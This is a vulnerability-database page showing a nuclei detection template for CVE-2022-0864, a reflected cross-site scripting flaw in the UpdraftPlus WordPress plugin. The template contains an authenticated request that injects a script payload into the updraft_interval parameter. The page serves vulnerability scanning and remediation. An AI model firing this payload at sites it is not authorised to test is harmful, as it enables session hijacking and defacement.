Lucene search
K

UpdraftPlus < 1.22.9 - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 45 Views

UpdraftPlus < 1.22.9 - Cross-Site Scripting vulnerability allows injection of malicious scripts into affected website, leading to data theft or defacement. Update to version 1.22.9 or later

Related
Refs
Code
id: CVE-2022-0864

info:
  name: UpdraftPlus < 1.22.9 - Cross-Site Scripting
  author: DhiyaneshDk
  severity: medium
  description: |
    The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Update UpdraftPlus plugin to version 1.22.9 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/7337543f-4c2c-4365-aebf-3423e9d2f872
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0864
    - https://wordpress.org/plugins/updraftplus
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0864
    cwe-id: CWE-79
    epss-score: 0.07355
    epss-percentile: 0.93655
    cpe: cpe:2.3:a:updraftplus:updraftplus:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: updraftplus
    product: updraftplus
    framework: wordpress
  tags: wpscan,cve,cve2022,xss,authenticated,updraftplus,wp-plugin,wp,wordpress,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/options-general.php?page=updraftplus&updraft_interval"></script><script>confirm('document_domain')</script> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "<script>confirm('document_domain')</script>"
          - "Existing backups"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d0329e4abb8e3df4a00ffd3146bf084350bdc3bfd7e1a3b2b74346e35758603f0221008a26c2e1c570112ad3c7f06205879026a70e4a0d792506352799f8d1d03d9ad9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.1
EPSS0.07355
45